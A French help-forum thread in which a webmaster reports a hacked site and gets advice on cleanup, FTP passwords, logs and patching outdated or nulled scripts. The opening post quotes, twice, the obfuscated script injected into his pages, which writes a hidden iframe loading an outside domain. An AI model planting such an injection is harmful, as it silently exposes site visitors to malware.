Que faire ? mon site a été piraté
marcelin
-
jjsteing Messages postés 1670 Date d'inscription Statut Contributeur Dernière intervention -
jjsteing Messages postés 1670 Date d'inscription Statut Contributeur Dernière intervention -
Bonjour, je ne sais comment mais mon site a été piraté et voici le script qui s'affiche a la fin de mes page
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%65%64%66%65%72%2E%63%6F%6D%2F%3F%32%36%33%30%37%36%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
en ouvran mon site, voici le message qui s'affiche : Avertissement : Visiter ce site peut être préjudiciable à votre ordinateur !
que faire?K
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%65%64%66%65%72%2E%63%6F%6D%2F%3F%32%36%33%30%37%36%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
en ouvran mon site, voici le message qui s'affiche : Avertissement : Visiter ce site peut être préjudiciable à votre ordinateur !
que faire?K
A voir également:
- Que faire ? mon site a été piraté
- Site de telechargement - Accueil - Outils
- Site comme coco - Accueil - Réseaux sociaux
- Quel site remplace coco - Accueil - Réseaux sociaux
- Le compte facebook d'un ami a été piraté - Guide
- Site x - Guide
8 réponses
Bonsoir,
Tu n as pas de sauvegarde de ton site ??
Sinon, ca a tout l aire de s etre mis dans tes fichiers *.js (javascript)
N'hésitez pas à poser des questions, il vaut mieux être con 5 min que le rester toute sa vie ;)
N'oubliez pas de mettre votre Post en 'Résolu' quand c'est le cas :-D
Tu n as pas de sauvegarde de ton site ??
Sinon, ca a tout l aire de s etre mis dans tes fichiers *.js (javascript)
N'hésitez pas à poser des questions, il vaut mieux être con 5 min que le rester toute sa vie ;)
N'oubliez pas de mettre votre Post en 'Résolu' quand c'est le cas :-D
si j'ai des sauvegarde. pouvez vous me dire comment cela s'est fait? afin de que puisse être prudent la prochaine fois?
voila l'adresse du site: http://www.abidjannais.com
voila l'adresse du site: http://www.abidjannais.com
non, just un site en html fait avec dreamweaver. aussi j'utilise des script pour la gestion de mes annonces et autres
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
Re,
Ça peut provenir de plusieurs choses. soit ton hébergeur s est fait vérolé, ou ton pc (dans ce cas, y a de grande (mal)chance que même ta sauvegarde soit vérolée).
Dans tous les cas, je te conseil de sécurisé un peu plus ton site, surtout l accès aux fichiers, via des fichiers .htaccess (une ptite recherche avec notre ami google te donnera des exemples)
Pour régler ton soucis, reupload tes fichiers js en ayant vérifié qu il n y ai pas eu de modifications (du code bizarre) ;)
N'hésitez pas à poser des questions, il vaut mieux être con 5 min que le rester toute sa vie ;)
N'oubliez pas de mettre votre Post en 'Résolu' quand c'est le cas :-D
Ça peut provenir de plusieurs choses. soit ton hébergeur s est fait vérolé, ou ton pc (dans ce cas, y a de grande (mal)chance que même ta sauvegarde soit vérolée).
Dans tous les cas, je te conseil de sécurisé un peu plus ton site, surtout l accès aux fichiers, via des fichiers .htaccess (une ptite recherche avec notre ami google te donnera des exemples)
Pour régler ton soucis, reupload tes fichiers js en ayant vérifié qu il n y ai pas eu de modifications (du code bizarre) ;)
N'hésitez pas à poser des questions, il vaut mieux être con 5 min que le rester toute sa vie ;)
N'oubliez pas de mettre votre Post en 'Résolu' quand c'est le cas :-D
Salut.
@jjsteing : Dans des fichiers .js, on ne trouve pas de balises HTML (<script>) ;)
Si lorsque tu télécharges le fichier (FTP -> disque dur), le code est encore présent, essaye en changeant le mot de passe FTP et en renvoyant les fichiers originaux : quelqu'un a sans doute obtenu ton mot de passe. Si ça se reproduit encore, alors c'est une faille au niveau du serveur ; La seule solution : contacter les administrateurs et s'ils ne bougent pas, aller voir chez la concurrence.
Si le code n'est plus présent après avoir téléchargé le fichier en local, alors c'est aussi une faille sur le serveur. Dans ce cas, c'est la même chose.
Pense également à ne pas donner ton mot de passe à n'importe qui ou n'importe quel site qui pourrait te le demander, et fais un scan anti-virus (tu as peut-être un keylogger)
@jjsteing : Dans des fichiers .js, on ne trouve pas de balises HTML (<script>) ;)
Si lorsque tu télécharges le fichier (FTP -> disque dur), le code est encore présent, essaye en changeant le mot de passe FTP et en renvoyant les fichiers originaux : quelqu'un a sans doute obtenu ton mot de passe. Si ça se reproduit encore, alors c'est une faille au niveau du serveur ; La seule solution : contacter les administrateurs et s'ils ne bougent pas, aller voir chez la concurrence.
Si le code n'est plus présent après avoir téléchargé le fichier en local, alors c'est aussi une faille sur le serveur. Dans ce cas, c'est la même chose.
Pense également à ne pas donner ton mot de passe à n'importe qui ou n'importe quel site qui pourrait te le demander, et fais un scan anti-virus (tu as peut-être un keylogger)
merci pour toutes ces reponse. j'avais oublier de mentionner que j'utilise phpbb pour mon forum et plusieur autres nulled script pour mon chat, et l'hergement de mes fichier images et audio.
Le problème est justement que s'il a obtenu son mot de passe, il peut très bien l'obtenir à nouveau si c'est un keylogger ou autre joyeuseté, sur son PC directement.
Changer le mot de passe FTP est une bonne idée, mais analyser les logs serait d'une plus grande utilité encore.
Déjà définir de quand date environ ce fameux affichage de page dangereuse.
De là vérifier les logs FTP si tu y a accès. Et surtout les logs du serveur web, pour vérifier si l'injection de code a été faite par là.
Parce que remettre ton site en état, soit, mais la faille ne sera pas corrigé si elle vient d'un de tes scripts ou d'une version obsolète connue pour avoir des failles, et donc potentiellement facilement piratable.
Vérifie donc également les versions des applis que tu héberges, et regardes si des correctifs ne sont pas sortis entre temps qui corrigent des failles de sécurité.
Changer le mot de passe FTP est une bonne idée, mais analyser les logs serait d'une plus grande utilité encore.
Déjà définir de quand date environ ce fameux affichage de page dangereuse.
De là vérifier les logs FTP si tu y a accès. Et surtout les logs du serveur web, pour vérifier si l'injection de code a été faite par là.
Parce que remettre ton site en état, soit, mais la faille ne sera pas corrigé si elle vient d'un de tes scripts ou d'une version obsolète connue pour avoir des failles, et donc potentiellement facilement piratable.
Vérifie donc également les versions des applis que tu héberges, et regardes si des correctifs ne sont pas sortis entre temps qui corrigent des failles de sécurité.